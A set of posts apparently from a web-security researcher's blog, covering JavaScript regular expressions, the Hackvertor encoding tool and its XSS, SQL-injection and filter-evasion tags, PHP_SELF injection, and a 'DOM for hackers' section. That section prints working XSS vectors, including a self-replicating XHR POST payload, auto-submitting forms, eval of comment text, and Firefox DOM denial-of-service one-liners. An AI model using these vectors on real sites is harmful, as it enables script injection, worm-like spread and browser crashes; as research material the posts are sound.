Javascript regular expressions

Ronald and I had a good conversation about Javascript regular expressions comparing them to PHP. He was having difficulty with the syntax because he was used to preg in PHP, so I promised to share my knowledge gained from developing various online scripts.

First up, preg_match in PHP can be achieved using the match function in Javascript. They are both very similar; it’s just a matter of getting your head round the different syntax. Match is part of the String object and here is how to use it:-

alert('Test'.match(/[a-z]/))

You can match subpatterns like this (I’ve tried to keep it as close to PHP syntax as possible):-

var pattern = /([a-z]+)([0-9]+)([A-Z]+)/;
var subject = 'test1234TEST';
var matches = subject.match(pattern); // [whole match, group 1, group 2, group 3]
var match1 = matches[1]; // 'test'
var match2 = matches[2]; // '1234'
var match3 = matches[3]; // 'TEST'
alert(match1);
alert(match2);
alert(match3);

You can also create matches using the RegExp object; this is useful for passing variables into the pattern, which to my knowledge isn’t possible with the “//” syntax.

var a = 'a+'; // the pattern is an ordinary string, so it can come from a variable
alert(new RegExp(a).exec('123aaaabcdef')); // 'aaaa'

The exec method can also be called from “//” patterns.

alert((/[0-9]+/).exec('12345abcdef'))

Javascript supports the modifiers “g”, “i” and “m”; here’s how to use them with “//” syntax:-

var matches = 'ababababababa'.match(/[a]/g); // with "g", match returns every match instead of subpatterns
alert(matches);        // a,a,a,a,a,a,a
alert(matches.length); // 7

Here’s how to use modifiers with the RegExp object:-

alert(RegExp('[test]+','i').exec('TeSt'))

Ok, I hope you’re following so far. I’m going to move on to replace now and how to use the various combinations.

Here’s how to use replace, notice how only one “t” is replaced:-

var str = 'test';
alert(str.replace('t','x')); // xest

In order to match more than one instance of the string and use a regular expression you have to do the following:-

alert('test'.replace(/t/g,'x'))

Javascript also supports anonymous functions within replace, which is really powerful; you can even nest the replaces and perform other logic:-

alert('teeest'.replace(/e+/g, function(str) {
  return str.replace(/e/g,'x');
}));

You can also use parentheses with replace and match the subpatterns like this:-

alert('567'.replace(/([0-9])([0-9])([0-9])/,'$3$2$1'));
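Two things the snippets above leave out, as an added example that is not from the original post: a preg_match_all equivalent built on exec() with the “g” flag (match with “g” throws the subpatterns away), and a replace() callback that receives the subpatterns as arguments. Function names are mine.

```javascript
// Added example (not from the original post): a preg_match_all-style helper
// built on exec() with the "g" flag, and a replace() callback that receives
// the capture groups. Function names are mine.

// Return every match of `pattern` in `subject`, each as [whole, group1, ...],
// as PHP's preg_match_all does. A fresh copy of the pattern is used so the
// caller's RegExp keeps its own lastIndex, and "g" is added if missing
// because exec() only advances lastIndex with that flag.
function pregMatchAll(pattern, subject) {
  var flags = pattern.flags.indexOf('g') === -1 ? pattern.flags + 'g' : pattern.flags;
  var re = new RegExp(pattern.source, flags);
  var out = [];
  var m;
  while ((m = re.exec(subject)) !== null) {
    // slice() drops the index/input properties exec() attaches to the array.
    out.push(Array.prototype.slice.call(m));
    // A pattern that can match the empty string would otherwise never advance.
    if (m[0].length === 0) re.lastIndex++;
  }
  return out;
}

// replace() with a function: it is called with the whole match followed by
// each capture group, so groups can be reordered or transformed with logic
// rather than only "$1" references.
function swapDigits(str) {
  return str.replace(/([0-9])([0-9])([0-9])/g, function (whole, a, b, c) {
    return c + b + a;
  });
}

// pregMatchAll(/([a-z]+)([0-9]+)/, 'ab12cd345EFG6')
//   -> [['ab12', 'ab', '12'], ['cd345', 'cd', '345']]
// swapDigits('567 and 123') -> '765 and 321'
```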

That’s all for now. I may follow up this article at a later date when I have some spare time; I hope you enjoyed it.

Google payloads

Description

Google has a cool free service for hosting open source projects which allows you to manage your source code over svn. You can also view the contents anonymously, but because some files directly output their contents it’s possible to use this service to host malicious server reflected attacks. The lack of any form of CAPTCHA also makes it easy for an attacker to automate this process.

POC

The following proof of concept uses the anonymous feature to include an HTML file which really contains javascript:-
Google payload poc

Recommendation

All file types should be forced to download when viewing their contents anonymously

Unicode half and full width conversion

I’ve been reading a lot about unicode over the past few weeks and I decided to add full/half conversion into Hackvertor as a learning exercise. It’s useful for testing IDS systems because certain web servers automatically convert the characters into the normal ASCII range.

Check it out here:-
Unicode demo

You can even assign a custom prefix to the conversion allowing you to produce urlencoded escapes or javascript escapes, a demo of that is available here:-
Custom prefix

Update..

Modified the prefixes slightly to allow hex entities as well:-
Entity demo

Another update..

It supports direct conversion of characters now:-
Direct conversion
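The conversion the demos above perform, as an added example that is not Hackvertor’s own code: ASCII to full width with an optional escape prefix (raw characters, javascript escapes, %u escapes or hex entities), the reverse mapping, and a check of why the conversion matters for filters, which goes a little beyond the post. Function and constant names are mine.

```javascript
// Added example (not Hackvertor's own code): half-width to full-width
// conversion of printable ASCII with an optional escape prefix, the reverse
// mapping, and a normalisation check. Function names are mine.

// Full-width forms U+FF01..U+FF5E mirror ASCII 0x21..0x7E at a fixed offset;
// U+3000 (ideographic space) is the full-width form of U+0020.
var FULLWIDTH_OFFSET = 0xFEE0;

// Convert ASCII to full width. With an empty prefix the raw characters are
// returned; '\\u' gives javascript escapes, '%u' gives the %uXXXX form that
// escape() produces, and '&#x' with suffix ';' gives hex entities.
function toFullWidth(str, prefix, suffix) {
  prefix = prefix || '';
  suffix = suffix || '';
  var out = '';
  for (var i = 0; i < str.length; i++) {
    var c = str.charCodeAt(i);
    var cp = c === 0x20 ? 0x3000 : (c >= 0x21 && c <= 0x7E ? c + FULLWIDTH_OFFSET : -1);
    if (cp === -1) { out += str.charAt(i); continue; } // leave non-ASCII alone
    out += prefix ? prefix + cp.toString(16).toUpperCase() + suffix : String.fromCharCode(cp);
  }
  return out;
}

// Reverse mapping of full-width characters back to ASCII.
function toHalfWidth(str) {
  return str.replace(/[\uFF01-\uFF5E\u3000]/g, function (ch) {
    var cp = ch.charCodeAt(0);
    return String.fromCharCode(cp === 0x3000 ? 0x20 : cp - FULLWIDTH_OFFSET);
  });
}

// NFKC compatibility normalisation folds full-width forms to ASCII, which is
// the effect of the automatic conversion some servers apply. A filter that
// inspects input before that step sees different characters from the ones
// the application acts on, so it should normalise first and match second.
function normalisesToSame(str) {
  return str.normalize('NFKC') === toHalfWidth(str);
}
```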

Code morphing

I’ve been working on a small project with the eventual goal of producing random morphing javascript. It’s still early stages at the moment but I thought I’d release it now because then I might get some motivation to improve it. I plan to add this functionality into Hackvertor as well as Spambam in future.

At the moment the script has multiple modes: the random mode selects parts of the source to encode and the other modes allow you to continually encode Javascript. The main problem with continually encoding is that the size of the source increases each time. I’ve had some great suggestions from Ronald, Mario and sirdarckcat and I plan to incorporate these into the next release.

Bugs

This is early code so there are quite a few bugs; the random mode doesn’t work all the time because some encoding methods return errors. Variables mode doesn’t work correctly yet as there’s a slight bug. I also need to improve the regular expressions for matching functions and then encoding with unicode. The unicode mode will also support double or maybe even triple encoding using multiple evals to return the desired string; this might take a bit of work to do but I think it will be worth it :)

Check it out here:-
Code morpher

Hackvertor update

Future plans

I’ve done a big change in the Hackvertor code to pave the way for some new features. In future I plan to create a web service where we can create/share Hackvertor tags for free. This will enable custom versions of Hackvertor for a specific task; for example we could have a SQL injection version, XSS version etc. and they could all be developed and improved by the community. When the server side stuff is completed that’s what you can look forward to :)

Restructure

For now though I’ve restructured all tags into their own object for easy storage; most tags now extend the native String object to make reuse between tags much easier. This makes tag code much shorter because conversions can be chained together like "".tobinary().zeroFill(16) etc. Using these methods I decided to create my own UTF-7 encode/decode tags [1] in javascript as a technical exercise to understand how UTF-7 works.

I’ve also redone the parameter options, which now allow quotes; this enables Hackvertor tags to pass commas as arguments. The option menu has also been removed: because more tags now have arguments, it is much easier to customise each tag’s usage than to search through options.

In case you hadn’t noticed, Hackvertor now takes external input, which allows you to share tags between friends and provide conversion examples or md5 hashes [2]. This can be accessed by simply clicking the HVURL button; it will base64 encode the current input and create an HVURL for you to share.

Docs and examples

It’s quite complicated now, and I’ve tried to reduce the clutter and make it as accessible as possible; the DOM object browser is now hidden by default to allow both input and output windows to be displayed next to each other and increased in size.

Tag parameters/arguments

Some tags accept additional options, which are displayed in () when adding a tag; for example it’s possible to change whether a hex_ent (hex entities) tag adds a semicolon or not. To include commas in a parameter you need to enclose it in quotes; take the replace tag for example:-
Replace tag example
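The structure described under Restructure and the quoted-parameter rule above, as an added example that is not Hackvertor’s own source: a few String prototype helpers that chain, a tag object that uses them, and an argument parser that keeps commas inside quotes. Names are mine, modelled on the tag names in the list below (tobinary, zeroFill, hex_ent with its semicolon option, replace).

```javascript
// Added example (not Hackvertor's own source): tags held in one object and
// built from small String.prototype helpers so conversions chain. Names are
// mine, modelled on the tags listed on the page.

// Binary form of each character, space separated.
String.prototype.tobinary = function () {
  var out = [];
  for (var i = 0; i < this.length; i++) out.push(this.charCodeAt(i).toString(2));
  return out.join(' ');
};

// Left-pad every space separated group to `width` digits with zeros.
String.prototype.zeroFill = function (width) {
  return this.split(' ').map(function (g) {
    while (g.length < width) g = '0' + g;
    return g;
  }).join(' ');
};

// Hexadecimal HTML entity for each character; the semicolon is optional,
// mirroring the hex_ent tag's argument.
String.prototype.hex_ent = function (semicolon) {
  var out = '';
  for (var i = 0; i < this.length; i++) {
    out += '&#x' + this.charCodeAt(i).toString(16) + (semicolon ? ';' : '');
  }
  return out;
};

// Tag registry: name -> function(input, args). Arguments arrive as an array,
// so a quoted parameter can carry commas, as in replace("a,b",c).
var tags = {
  bin: function (s) { return s.tobinary().zeroFill(8); },
  hex_ent: function (s, args) { return s.hex_ent(args[0] !== 'false'); },
  replace: function (s, args) { return s.split(args[0]).join(args[1]); }
};

// Split a parameter list on commas, keeping commas that sit inside double quotes.
function parseArgs(text) {
  var args = [], m, re = /"([^"]*)"|([^,]+)/g;
  while ((m = re.exec(text)) !== null) args.push(m[1] !== undefined ? m[1] : m[2]);
  return args;
}

// Apply one tag by name: runTag('replace', '"a,b",c', 'xa,by') -> 'xcy'
function runTag(name, argText, input) {
  return tags[name](input, parseArgs(argText || ''));
}
```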

Tag list

Here I shall document each tag category and provide an example from each.

Encode (Converts every character in a string to the chosen encoding)

  • base64 - Base64 encode a string (Uses Firefox’s native functions)
  • hex_ent - Create Hexadecimal HTML entities from the string.
  • dec_ent - Decimal HTML entities
  • dec - Converts each character into a decimal escape
  • hex - Creates a javascript hexadecimal string.
  • uni - Converts to javascript unicode string.
  • oct - Octal encoding
  • urlenc - Javascript escape wrapper (Performs a standard urlencode)
  • realurlenc - Custom urlencoder (Encodes all characters)
  • htmlent - Converts standard HTML entities
  • utf7 - Creates a UTF-7 encoded string to be used with character set attacks.

realurlenc tag example

Decode (Decodes a string that has been encoded)

  • d_base64 - Decodes a base64 encoded string using Firefox’s native functions
  • d_bin - Converts from binary
  • d_dec - Decodes decimal escapes/HTML entities
  • d_hex - Decodes hex entities or hex javascript escapes
  • d_uni - Decodes unicode strings
  • d_oct - Decodes octal escapes
  • d_enc - Unescape wrapper (Decodes urlencoded string)
  • d_realenc - Clone of d_enc tag added for clarity
  • d_htmlent - Decode HTML entities
  • d_utf7 - Decodes a UTF-7 encoded string

d_oct example

Filter Evasion (Tags used to test and bypass XSS filters)

  • backslashesc - Javascript/CSS backslash escapes to obscure identifiers or functions
  • backslashnulles - Same as above but with additional null characters
  • backslashnzullesc - Same as above but with zero padded nulls
  • toternary - Converts any string into javascript ternary statements; each character is separated and the entire string is enclosed in an anonymous function.

backslashesc example

String (String manipulation tags, javascript based functionality with additional extras)

  • javachar - Converts the string into Java lang character codes
  • tocharcodes - Converts to standard character codes
  • fromcharcodes - Convert from character codes (separated with commas)
  • dquote - Add double quotes to a string
  • squote - Add single quotes to a string
  • bticks - Adds backticks around a string
  • js2str - Executes a javascript statement and returns the string
  • stripnewlines - Removes new lines
  • ucfirst - Converts the first letter of every word to uppercase
  • upper - Converts to uppercase
  • lower - Converts to lowercase
  • mixed - Mixed case letters
  • find - Find a string using regular expressions
  • replace - Replaces the string with the arguments given
  • splitjoin - Splits the string into pieces and then joins it together with the arguments specified.
  • splitjointag - Same as above only instead of joining a character you can join with a tag
  • repeat - Repeats the content of the tag the number of times specified in the argument
  • reverse - Reverses the text
  • length - Returns the length of the enclosed string
  • substr - Return parts of the string specified in the arguments

Split join tag example (First parameter is the string to split, second is the join character and third is the tag to surround the result)

Fuzzing (Random character generation tags)

  • randchars - Return a random set of characters with the amount specified in a parameter
  • randnum - Same as above with numbers
  • randletters - Random letters
  • randletternums - Random letters and numbers
  • nullents - Return a random null html entity character (Can be used to obscure function calls etc)

Random characters example

Hashing (Performs hashing functions on a string)

  • md4 - Performs a MD4 hash of a string
  • md5 - Performs a MD5 hash of a string
  • sha1 - Performs a sha1 hash of a string
  • sha2 - Performs a sha2 hash of a string
  • hmac_md4 - Performs an hmac_md4 hash of a string; the argument is the HMAC key
  • hmac_md5 - Performs an hmac_md5 hash of a string; the argument is the HMAC key
  • hmac_sha1 - Performs an hmac_sha1 hash of a string; the argument is the HMAC key

sha1_hmac example

Convert (Conversion tags to perform numeric or other special conversions)

  • bin - Convert the string to binary
  • hex2rgb - Convert a HTML colour to RGB
  • rgb2hex - Converts RGB colours to HTML hex colours
  • dec2hex - Converts a number to hex
  • dec2oct - Converts a number to octal

Dec2hex example

Common inputs (Tags to save time typing which are used frequently)

  • c_js - Inserts the javascript: protocol string
  • c_alert - Standard javascript alert
  • c_script - Inserts a script tag
  • c_eval - Javascript eval
  • c_link - HTML link
  • c_iframe - HTML iframe
  • c_null - Inserts a null character
  • c_tab - Inserts a tab character
  • c_newline - Inserts a new line character
  • c_maxunicode - Returns the maximum unicode character number

Tab example

XSS (Tags to be used creating XSS vectors)

  • mozbindingcss - Creates a link to a XML file in CSS which can execute javascript
  • mozbindingxml - Creates the standard XML which will execute javascript in CSS (Use in combination with the mozbindingcss tag)
  • mozbindingexpression - Creates a cross compatible CSS vector which works on IE and Firefox
  • image - Image based XSS
  • script - External js file inclusion
  • background - HTML background javascript XSS
  • backgroundcss - CSS background javascript XSS
  • cssexpression - IE CSS javascript
  • flash - Flash XSS files
  • data - Data protocol urls

mozbindingexpression example

SQL (SQL injection tags)

  • sqlchr - Separates characters into a sqlchr statement
  • sqlcomment - Creates a SQL statement with comments around letters to obscure common commands.
  • sqlchar - Converts a string to hex and char SQL function calls
  • sqlascii - Same as above but with ASCII
  • sqlor - Creates a string from separated OR statements
  • sqlhex - Creates a hex number from each character

SQL comment example

Date (Date based tags, quite sparse at the moment)

  • date2timestamp - Converts a date into a UNIX timestamp
  • timestamp2date - Converts a timestamp into a date

timestamp2date example

Encrypt (Encryption tags)

  • caesar_enc - Caesar encryption; the argument specifies the key
  • morse_enc - Converts to morse code (I dunno why I’ve put this encryption but I couldn’t find a good spot for it)
  • caesar_dec - Decrypts caesar encrypted data
  • morse_dec - Decodes morse code

Morse code example

Keyboard shortcuts

  • CTL+SHIFT+Backspace - Clear Hackvertor
  • CTL+SHIFT+B - DOM Browser
  • CTL+SHIFT+C - Convert
  • CTL+SHIFT+E - Execute output
  • CTL+SHIFT+H - Test in HTML
  • CTL+SHIFT+I - Select input
  • CTL+SHIFT+O - Select output
  • CTL+SHIFT+S - Swap input/output
  • CTL+SHIFT+T - Clear tags
  • CTL+SHIFT+U - Create URL

References

[1] UTF7
[2] MD5

DOM Da DOM

I’ve seen many javascript libraries on the internet like Scriptaculous and jQuery which are superb at what they do but…I wanted a nice easy reference to the DOM functions and shortcuts. So I decided to build a little helper application which will allow you to quickly look up the required function. The code is pretty basic at the moment but it will identify objects you write in the code window, and in future I plan to add interaction between them through the menus.

Take a look at it here:-
DOM Da DOM

Any comments or suggestions are of course welcome.

Update…

Thijs Lensselink has kindly patched the code to fix a bug. Thanks Thijs, your help is very much appreciated. I plan to update the tool soon when I’ve finished a few other projects.

Exploiting PHP SELF

Eric Butera emailed me with a very interesting topic about protecting against PHP_SELF exploits. I thought it might be a good idea to gather a few test cases demonstrating the problem. Why PHP allows these URLs is beyond me, and it wouldn’t take much work to filter out these malicious URLs in the PHP code.

For any of you that don’t know, it’s possible to inject code into PHP_SELF. It works by supplying a “/” after the actual PHP file then entering your desired code. I’ve done 4 test cases which show how it’s possible to inject javascript and perform a redirect on code which doesn’t filter PHP_SELF correctly.

Test case 1

Injects data into an HTTP header. Although this scenario is not very likely, I thought I would include it to show that even running htmlentities or htmlspecialchars won’t save you from attack completely.

Test case 2

Shows how easy it is to inject XSS into links; this is very likely, as many PHP applications often refer to the same page to change the current action/display.

Test case 3

A search page often includes references to PHP_SELF and can be exploited as easily as links.

Test case 4

Finally I show how code can be injected directly on the page without the need to break out of anything.

The test cases can be downloaded here:-
Test cases

Valid Javascript variables

I’ve put together a simple script which will use the Javascript parser to find a list of valid variables. This information is useful to know when testing XSS filters or malicious javascript detection. Using these unusual variables I’ve managed to slip Javascript past some very clever filters including the PHPIDS and NoScript.

Check it out here:-
Variable tester

DOM DOS Firefox

Check this DOS in Firefox:-

<img src="" onerror="appendChild(cloneNode(appendChild(cloneNode(1))))">

There are many DOM related Firefox problems, this was one of the more interesting ones I found :)

DOM for hackers

It’s amazing the stuff I’ve been finding recently; my browser has crashed more times than windoze. In this article I’ll introduce you to using the DOM for unexpected things and hacking it to your advantage. I’ve learned all this new stuff while hacking vectors for the slackers XSS contest, which is really fun.

Contents of a script tag

You can get the contents of a script tag within DOM like this:-

<script id="x">alert(document.getElementById('x').
childNodes.item(0).nodeValue)</script>

Replacing tags

It’s quite easy to replace one tag with another in ways the browser didn’t expect; check the following example:-

<form><iframe onload="parentNode.innerHTML=(s=parentNode.innerHTML)
.replace(/iframe/g,'input'),value=s" name="content"></iframe>

Posting forms

There are lots of shortcuts for posting forms with the DOM; here I show how to use an image tag to automatically create a form and post content.

<img src="" onerror="with(appendChild(createElement('form')))
submit(i=createElement('input'),i.name='content',i.value='1',
appendChild(i),action='post.php',method='post')">

Comment hacking

You can also get the contents of comments in DOM like this:-

<!-- test --><img src="" onerror="alert(previousSibling.nodeValue)">

Even evaluate the resulting string:-

<!-- alert('Hello') --><img src="" onerror="eval(previousSibling.nodeValue)">

Entity hacking

You can also do the same with entities :)

&Hello<img src="" onerror="alert(previousSibling.nodeValue.replace('&',''))">

and even this:-

&iframe onload=alert(1)><img src="" onerror="innerHTML=previousSibling.nodeValue.replace('&','<')">

Self referencing code

You can get the contents of an attribute and create a self referencing tag that requires no parent:-

<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),
send('content='<img src=%22%22 onerror=%22'+attributes[0].nodeValue+'%22>')">

This example uses an XHR object to perform a post; the XHR portion of this vector was constructed by a lot of cool people on the slackers XSS contest.

Here’s another example that I discovered:-

<img src="" onerror="appendChild(cloneNode(0));alert(innerHTML)">

DOM recursion

Finally it’s also possible to make a tag clone itself onto itself:-

<img src="" onerror="appendChild(cloneNode(1))">